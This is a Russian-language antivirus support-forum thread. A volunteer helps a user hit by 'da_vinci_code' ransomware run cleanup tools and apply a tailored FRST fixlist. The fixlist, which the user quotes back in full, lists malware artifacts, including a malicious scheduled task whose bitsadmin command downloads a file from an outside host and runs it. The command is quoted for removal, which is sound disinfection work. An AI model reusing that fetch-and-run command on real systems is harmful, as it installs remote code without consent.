Angelalina Опубликовано 12 ноября, 2016 Опубликовано 12 ноября, 2016 Вчера каким то образом был схвачен вирус, который зашифровал файлы doc, docx, xls, xlsx, pdf, jpeg на диске С и внешнем жестком диске в длинное название типа rU3Оx39Q3RgYrrK8IGUd0HAFfRЕwiBpvTBFXGEMRD2SBUMfLSl1J0nIjWHtgIAUUU8q.A2895AF0B314D2BC7B=26 и расширение da_vinci_code. Проверяла утилитой доктора веба и касперский, были удалены и обезврежены троян и Backdoor.Win32.Androm.jtql Возможно ли как то расшифровать наши файлы? logi.rar
thyrex Опубликовано 12 ноября, 2016 Опубликовано 12 ноября, 2016 Выполните https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]
Angelalina Опубликовано 12 ноября, 2016 Автор Опубликовано 12 ноября, 2016 Выполните https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url] прошу прощения за невнимательность, очень расстроена, так как полетела вся работа, вкладываю верный файл CollectionLog-2016.11.12-22.59.zip
mike 1 Опубликовано 13 ноября, 2016 Опубликовано 13 ноября, 2016 Вот в правилах кажется четко написано, что запускать Автологгер нужно уже после проверки Cureit или KVRT, но люди все равно предпочитают все делать по своему. Ваша невнимательность в конечном счете играет против вас. Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе. Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt. Прикрепите отчет к своему следующему сообщению. Подробнее читайте в этом руководстве. 1
Angelalina Опубликовано 18 ноября, 2016 Автор Опубликовано 18 ноября, 2016 Доброго времени суток! Вынужденна признать свою глупость и невнимательность, но увы увидела этот форум уже после своих "умных" шагов..... просто беременный мозг на фоне нервотрепки от шока потерянных за 20 лет работ, не сообразила сразу как поступить.... Вот в правилах кажется четко написано, что запускать Автологгер нужно уже после проверки Cureit или KVRT, но люди все равно предпочитают все делать по своему. Ваша невнимательность в конечном счете играет против вас. Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе. Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt. Прикрепите отчет к своему следующему сообщению. Подробнее читайте в этом руководстве. AdwCleanerS0.txt
mike 1 Опубликовано 18 ноября, 2016 Опубликовано 18 ноября, 2016 Вот так люди и теряют свои данные из-за невнимательности. от шока потерянных за 20 лет работ Глупо хранить данные в одном экземпляре. Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления. Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt. Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. Подробнее читайте в этом руководстве. 1
Angelalina Опубликовано 18 ноября, 2016 Автор Опубликовано 18 ноября, 2016 Вот так люди и теряют свои данные из-за невнимательности. от шока потерянных за 20 лет работ Глупо хранить данные в одном экземпляре. Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления. Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt. Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. Подробнее читайте в этом руководстве. впредь будем осторожнее, будет уроком... только бы восстановить, т.к. мама преподаватель, .. AdwCleanerS4.txt
mike 1 Опубликовано 18 ноября, 2016 Опубликовано 18 ноября, 2016 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. 1
Angelalina Опубликовано 18 ноября, 2016 Автор Опубликовано 18 ноября, 2016 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. Addition.txt FRST.txt
mike 1 Опубликовано 18 ноября, 2016 Опубликовано 18 ноября, 2016 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM\...\Policies\Explorer\Run: [AppDownloads] => C:\Program Files (x86)\Common Files\9C06BCB0-82AC-4B0A-82CD-30D1CA6E67A5\6C66C88B-7A26-4B86-8BE3-63E1C7522994.exe GroupPolicy: Restriction <======= ATTENTION GroupPolicy\User: Restriction <======= ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X] 2016-11-12 15:40 - 2016-11-12 18:21 - 00000000 __SHD C:\Users\Все пользователи\Csrss 2016-11-12 15:39 - 2016-11-12 15:39 - 06220854 _____ C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README9.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README8.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README7.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README6.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README5.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README4.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README3.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README2.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README10.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README9.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README8.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README7.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README6.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README5.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README4.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README3.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README2.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README10.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README1.txt 2016-11-12 11:40 - 2016-11-12 11:40 - 19950641 _____ C:\Users\Арсений\Downloads\47C3.tmp 2016-11-12 11:40 - 2016-11-12 11:40 - 17426301 _____ C:\Users\Арсений\Downloads\779D.tmp 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README9.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README8.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README7.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README6.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README5.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README4.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README3.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README2.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README10.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README1.txt 2016-11-10 15:31 - 2016-11-12 22:14 - 00000000 __SHD C:\Users\Все пользователи\Windows 2016-11-12 11:49 - 2016-03-25 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\adblockpro 2016-11-12 11:49 - 2016-03-04 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Color quantizer 2016-11-12 11:49 - 2016-01-29 07:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\exchange_rates4 2016-11-12 11:49 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\everysale4 2016-11-12 11:49 - 2015-09-19 17:13 - 00000000 ____D C:\Users\Арсений\AppData\LocalLow\IObit 2016-11-12 11:49 - 2015-07-23 06:40 - 00000000 ____D C:\Users\Арсений\AppData\Local\{B7A56E6D-32CD-4B27-9475-F7986C6F0A79} 2016-11-12 11:45 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Neiron 2016-11-12 11:42 - 2016-05-07 10:18 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PushControl 2016-11-12 11:42 - 2016-03-11 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PngOptimizer 2016-11-12 11:42 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\phoenixguard 2016-11-12 11:42 - 2016-01-21 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\RotatorCom 2016-11-12 15:39 - 2016-11-12 15:39 - 6220854 _____ () C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp 2015-12-28 08:28 - 2015-12-28 08:28 - 0000000 _____ () C:\Users\Арсений\AppData\Roaming\smw_inst 2015-05-25 18:33 - 2014-11-18 02:32 - 0145792 _____ () C:\Users\Арсений\AppData\Local\downloader.exe 2015-07-09 09:43 - 2015-04-28 22:43 - 0226608 ____H () C:\Users\Арсений\AppData\Local\YаndехWоrking.bаt.exe C:\Users\Арсений\AppData\Local\Temp\dlCC3667C5-D2D6-F246-ACCE-C8E0E11ABCF6.exe C:\Users\Арсений\AppData\Local\Temp\fdab-bb8f-c8d6-fed8.exe CHR Extension: (PushControl) - C:\Users\Арсений\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-11-12] OPR Extension: (PushControl) - C:\Users\Арсений\AppData\Roaming\Opera Software\Opera Stable\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-10-08] Task: {0548EDA3-F0BE-4423-BCA4-06E67A8E4992} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-3 -> No File <==== ATTENTION Task: {0AADEDDF-2748-43C9-BC7B-A1D633CFA60C} - \{C95FB150-ADF7-48C6-98DB-CD41E1F591A0} -> No File <==== ATTENTION Task: {1189E51D-6237-4612-B476-9E1FB97D96B1} - \ab9abeea-5773-48bd-9edb-1523a83931f0-1-7 -> No File <==== ATTENTION Task: {218FB66E-0FC9-49A4-A491-0AFDB348D6C6} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-7 -> No File <==== ATTENTION Task: {2518EF67-3C14-4D63-ABC6-2C28FE79F527} - \ab9abeea-5773-48bd-9edb-1523a83931f0-5 -> No File <==== ATTENTION Task: {26781457-5B5D-4824-9023-B7883780D852} - \661bdf61-c239-4c93-bfcf-75fc6de99748-5 -> No File <==== ATTENTION Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION Task: {31AD63C8-A0C2-4EC0-A360-2DF3ABB295AD} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-5 -> No File <==== ATTENTION Task: {3ABDBA19-82A6-4797-9F52-3A5F12DBF865} - \Microsoft\Windows\AFAF010F9-3968-4D9A-B0A3-F82574967D56 -> No File <==== ATTENTION Task: {3AE4C7D6-61BB-4EC2-98DD-B430548AA89F} - System32\Tasks\WinThruster64-Арсений-Notification => C:\Program Files\Solvusoft\WinThruster\Sync.exe [2015-10-11] (Solvusoft Corporation) <==== ATTENTION Task: {4A851E1C-6A1F-44AA-81E1-6AC62E2E8447} - \661bdf61-c239-4c93-bfcf-75fc6de99748-3 -> No File <==== ATTENTION Task: {57BCF1DF-9934-4325-9299-CD1F0CDFBA45} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-11 -> No File <==== ATTENTION Task: {783C4488-97F2-45D2-AB9F-BCB1A4DB4373} - \661bdf61-c239-4c93-bfcf-75fc6de99748-1-7 -> No File <==== ATTENTION Task: {92985D1D-263F-4204-B561-A85A0D87B510} - \ab9abeea-5773-48bd-9edb-1523a83931f0-11 -> No File <==== ATTENTION Task: {968432BD-B93A-457C-BF8E-BDCED9265DB7} - \ab9abeea-5773-48bd-9edb-1523a83931f0-3 -> No File <==== ATTENTION Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION Task: {B681BEC0-9DF8-4F25-B6F9-09CFB80FDEC4} - System32\Tasks\RotatorCom => "/q /c start /min /wait bitsadmin /transfer d /download /priority foreground hxxp://krible-krable-bums.com/api/task/689556.lnk %TMP%\torrent.lnk & start %TMP%\torrent.lnk" Task: {C424AA00-F317-400A-850A-0CFF4F3EF5EC} - \Crossbrowse -> No File <==== ATTENTION Task: {D3B035B2-0330-4BA3-BD7B-B14EE208800F} - \ab9abeea-5773-48bd-9edb-1523a83931f0-7 -> No File <==== ATTENTION Task: {E08B7A9E-2127-4F73-AC12-5C9AE3DF6AC0} - \661bdf61-c239-4c93-bfcf-75fc6de99748-11 -> No File <==== ATTENTION Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION Task: {FC385C00-011B-4B7E-97CF-B3589A5C8BE0} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-1-7 -> No File <==== ATTENTION Task: C:\Windows\Tasks\WinThruster64-Арсений-Notification.job => C:\Program Files\Solvusoft\WinThruster\Sync.exe <==== ATTENTION Task: C:\Windows\Tasks\WinThruster64-Арсений-Startup.job => C:\Program Files\Solvusoft\WinThruster\WinThruster64.exe <==== ATTENTION MSCONFIG\startupreg: cobunce => "C:\Users\Арсений\AppData\Local\cobunce\stub.exe" /run "C:\Users\Арсений\AppData\Local\cobunce\config.json" Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму 1
Angelalina Опубликовано 18 ноября, 2016 Автор Опубликовано 18 ноября, 2016 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM\...\Policies\Explorer\Run: [AppDownloads] => C:\Program Files (x86)\Common Files\9C06BCB0-82AC-4B0A-82CD-30D1CA6E67A5\6C66C88B-7A26-4B86-8BE3-63E1C7522994.exe GroupPolicy: Restriction <======= ATTENTION GroupPolicy\User: Restriction <======= ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X] 2016-11-12 15:40 - 2016-11-12 18:21 - 00000000 __SHD C:\Users\Все пользователи\Csrss 2016-11-12 15:39 - 2016-11-12 15:39 - 06220854 _____ C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README9.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README8.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README7.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README6.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README5.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README4.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README3.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README2.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README10.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README9.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README8.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README7.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README6.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README5.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README4.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README3.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README2.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README10.txt 2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README1.txt 2016-11-12 11:40 - 2016-11-12 11:40 - 19950641 _____ C:\Users\Арсений\Downloads\47C3.tmp 2016-11-12 11:40 - 2016-11-12 11:40 - 17426301 _____ C:\Users\Арсений\Downloads\779D.tmp 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README9.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README8.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README7.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README6.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README5.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README4.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README3.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README2.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README10.txt 2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README1.txt 2016-11-10 15:31 - 2016-11-12 22:14 - 00000000 __SHD C:\Users\Все пользователи\Windows 2016-11-12 11:49 - 2016-03-25 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\adblockpro 2016-11-12 11:49 - 2016-03-04 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Color quantizer 2016-11-12 11:49 - 2016-01-29 07:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\exchange_rates4 2016-11-12 11:49 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\everysale4 2016-11-12 11:49 - 2015-09-19 17:13 - 00000000 ____D C:\Users\Арсений\AppData\LocalLow\IObit 2016-11-12 11:49 - 2015-07-23 06:40 - 00000000 ____D C:\Users\Арсений\AppData\Local\{B7A56E6D-32CD-4B27-9475-F7986C6F0A79} 2016-11-12 11:45 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Neiron 2016-11-12 11:42 - 2016-05-07 10:18 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PushControl 2016-11-12 11:42 - 2016-03-11 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PngOptimizer 2016-11-12 11:42 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\phoenixguard 2016-11-12 11:42 - 2016-01-21 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\RotatorCom 2016-11-12 15:39 - 2016-11-12 15:39 - 6220854 _____ () C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp 2015-12-28 08:28 - 2015-12-28 08:28 - 0000000 _____ () C:\Users\Арсений\AppData\Roaming\smw_inst 2015-05-25 18:33 - 2014-11-18 02:32 - 0145792 _____ () C:\Users\Арсений\AppData\Local\downloader.exe 2015-07-09 09:43 - 2015-04-28 22:43 - 0226608 ____H () C:\Users\Арсений\AppData\Local\YаndехWоrking.bаt.exe C:\Users\Арсений\AppData\Local\Temp\dlCC3667C5-D2D6-F246-ACCE-C8E0E11ABCF6.exe C:\Users\Арсений\AppData\Local\Temp\fdab-bb8f-c8d6-fed8.exe CHR Extension: (PushControl) - C:\Users\Арсений\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-11-12] OPR Extension: (PushControl) - C:\Users\Арсений\AppData\Roaming\Opera Software\Opera Stable\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-10-08] Task: {0548EDA3-F0BE-4423-BCA4-06E67A8E4992} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-3 -> No File <==== ATTENTION Task: {0AADEDDF-2748-43C9-BC7B-A1D633CFA60C} - \{C95FB150-ADF7-48C6-98DB-CD41E1F591A0} -> No File <==== ATTENTION Task: {1189E51D-6237-4612-B476-9E1FB97D96B1} - \ab9abeea-5773-48bd-9edb-1523a83931f0-1-7 -> No File <==== ATTENTION Task: {218FB66E-0FC9-49A4-A491-0AFDB348D6C6} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-7 -> No File <==== ATTENTION Task: {2518EF67-3C14-4D63-ABC6-2C28FE79F527} - \ab9abeea-5773-48bd-9edb-1523a83931f0-5 -> No File <==== ATTENTION Task: {26781457-5B5D-4824-9023-B7883780D852} - \661bdf61-c239-4c93-bfcf-75fc6de99748-5 -> No File <==== ATTENTION Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION Task: {31AD63C8-A0C2-4EC0-A360-2DF3ABB295AD} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-5 -> No File <==== ATTENTION Task: {3ABDBA19-82A6-4797-9F52-3A5F12DBF865} - \Microsoft\Windows\AFAF010F9-3968-4D9A-B0A3-F82574967D56 -> No File <==== ATTENTION Task: {3AE4C7D6-61BB-4EC2-98DD-B430548AA89F} - System32\Tasks\WinThruster64-Арсений-Notification => C:\Program Files\Solvusoft\WinThruster\Sync.exe [2015-10-11] (Solvusoft Corporation) <==== ATTENTION Task: {4A851E1C-6A1F-44AA-81E1-6AC62E2E8447} - \661bdf61-c239-4c93-bfcf-75fc6de99748-3 -> No File <==== ATTENTION Task: {57BCF1DF-9934-4325-9299-CD1F0CDFBA45} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-11 -> No File <==== ATTENTION Task: {783C4488-97F2-45D2-AB9F-BCB1A4DB4373} - \661bdf61-c239-4c93-bfcf-75fc6de99748-1-7 -> No File <==== ATTENTION Task: {92985D1D-263F-4204-B561-A85A0D87B510} - \ab9abeea-5773-48bd-9edb-1523a83931f0-11 -> No File <==== ATTENTION Task: {968432BD-B93A-457C-BF8E-BDCED9265DB7} - \ab9abeea-5773-48bd-9edb-1523a83931f0-3 -> No File <==== ATTENTION Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION Task: {B681BEC0-9DF8-4F25-B6F9-09CFB80FDEC4} - System32\Tasks\RotatorCom => "/q /c start /min /wait bitsadmin /transfer d /download /priority foreground hxxp://krible-krable-bums.com/api/task/689556.lnk %TMP%\torrent.lnk & start %TMP%\torrent.lnk" Task: {C424AA00-F317-400A-850A-0CFF4F3EF5EC} - \Crossbrowse -> No File <==== ATTENTION Task: {D3B035B2-0330-4BA3-BD7B-B14EE208800F} - \ab9abeea-5773-48bd-9edb-1523a83931f0-7 -> No File <==== ATTENTION Task: {E08B7A9E-2127-4F73-AC12-5C9AE3DF6AC0} - \661bdf61-c239-4c93-bfcf-75fc6de99748-11 -> No File <==== ATTENTION Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION Task: {FC385C00-011B-4B7E-97CF-B3589A5C8BE0} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-1-7 -> No File <==== ATTENTION Task: C:\Windows\Tasks\WinThruster64-Арсений-Notification.job => C:\Program Files\Solvusoft\WinThruster\Sync.exe <==== ATTENTION Task: C:\Windows\Tasks\WinThruster64-Арсений-Startup.job => C:\Program Files\Solvusoft\WinThruster\WinThruster64.exe <==== ATTENTION MSCONFIG\startupreg: cobunce => "C:\Users\Арсений\AppData\Local\cobunce\stub.exe" /run "C:\Users\Арсений\AppData\Local\cobunce\config.json" Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Fixlog.txt
mike 1 Опубликовано 18 ноября, 2016 Опубликовано 18 ноября, 2016 Смените все пароли. Пишите запрос https://forum.kasperskyclub.ru/index.php?showtopic=48525 1
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти